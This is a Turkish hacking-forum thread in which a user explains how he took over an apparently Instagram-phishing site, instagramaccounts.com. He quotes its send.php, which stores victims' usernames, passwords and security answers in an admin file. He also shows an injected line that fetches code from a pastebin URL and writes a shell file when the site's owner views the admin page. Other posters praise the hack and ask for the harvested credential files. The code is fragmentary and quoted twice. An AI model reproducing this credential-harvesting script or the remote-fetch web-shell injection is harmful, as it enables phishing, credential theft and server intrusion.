Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
İnstagramaccounts.Com Heykıt
İnstagramaccounts.Com Heykıt
-
Hocam nasıl hackledın
-
d3lete bunu yazdı
Hocam nasıl hackledın
El klasiko
-
d3lete bunu yazdı
Hocam nasıl hackledın
Bende meraktayim
-
instagramaccounts.com/add_security_question/480-5af2deddc05/
yavan redirect cekiyor -
httpdocs/add_security_question/confirm_number/send.php
function tr($tr){
$hallet=iconv("UTF-8", "ISO-8859-9",$tr);
return $hallet;
}//fonksiyon sonu
$herhangi_bir_gelen_veri=tr($_POST['veri']);
$dosya_adi = "../../data/admin.php";
$username = $_POST["username"];
$password = $_POST["password"];
$guvenliksorusu = $_POST["guvenliksorusu"];
$guvenliksorusucevabi = $_POST["guvenliksorusucevabi"];
$yazilacak_deger = "Kullanıcı Adı: $username \r\n Şifre: $password \r\n Güvenlik Sorusu: $guvenliksorusu \r\n Cevap: $guvenliksorusucevabi \r\n
";
//Degerler programa gonderilmis ise,
if ($username || $password || $guvenliksorusu || $guvenliksorusucevabi) {
//Yazilacak dosya sistemde yer aliyor ise,
if (!file_exists($dosya_adi)){
touch($dosya_adi);
}
Send.php içinde Hiç bir kod parçacığı yok Safımızın Admin Sayfasına Girip bakmasıyla$cak = $_SERVER['DOCUMENT_ROOT'] . "/muro.php" ;
$gelsin = http_http('http://pastebin.com/raw/t5rTmcORs');Benim o kekin sayfada girip bakmışmı bakmamışmı arada kontrol etmem kekin düştüğünü görünce Küçük Shell kodumu Sunucuda çalıştırmak neticesinde Hacked.
-
EcHoLL bunu yazdı
httpdocs/add_security_question/confirm_number/send.php
function tr($tr){
$hallet=iconv("UTF-8", "ISO-8859-9",$tr);
return $hallet;
}//fonksiyon sonu
$herhangi_bir_gelen_veri=tr($_POST['veri']);
$dosya_adi = "../../data/admin.php";
$username = $_POST["username"];
$password = $_POST["password"];
$guvenliksorusu = $_POST["guvenliksorusu"];
$guvenliksorusucevabi = $_POST["guvenliksorusucevabi"];
$yazilacak_deger = "Kullanıcı Adı: $username \r\n Şifre: $password \r\n Güvenlik Sorusu: $guvenliksorusu \r\n Cevap: $guvenliksorusucevabi \r\n
";
//Degerler programa gonderilmis ise,
if ($username || $password || $guvenliksorusu || $guvenliksorusucevabi) {
//Yazilacak dosya sistemde yer aliyor ise,
if (!file_exists($dosya_adi)){
touch($dosya_adi);
}
Send.php içinde Hiç bir kod parçacığı yok Safımızın Admin Sayfasına Girip bakmasıyla$cak = $_SERVER['DOCUMENT_ROOT'] . "/muro.php" ;
$gelsin = http_http('http://pastebin.com/raw/t5rTmcORs');Benim o kekin sayfada girip bakmışmı bakmamışmı arada kontrol etmem kekin düştüğünü görünce Küçük Shell kodumu Sunucuda çalıştırmak neticesinde Hacked.
Hocam süper avlamışsın
-
dosyaları almamız mümkün mü acaabağğ ?
-
echoll sen tövbe etmemişmiydin bu işlere :D
-
nereodi bunu yazdı
echoll sen tövbe etmemişmiydin bu işlere :D
Ben Tövbemi geri aldım Tanrım sen bağışla beni :)
-
EcHoLL bunu yazdınereodi bunu yazdı
echoll sen tövbe etmemişmiydin bu işlere :D
Ben Tövbemi geri aldım Tanrım sen bağışla beni :)
(F) seviliyorsun :)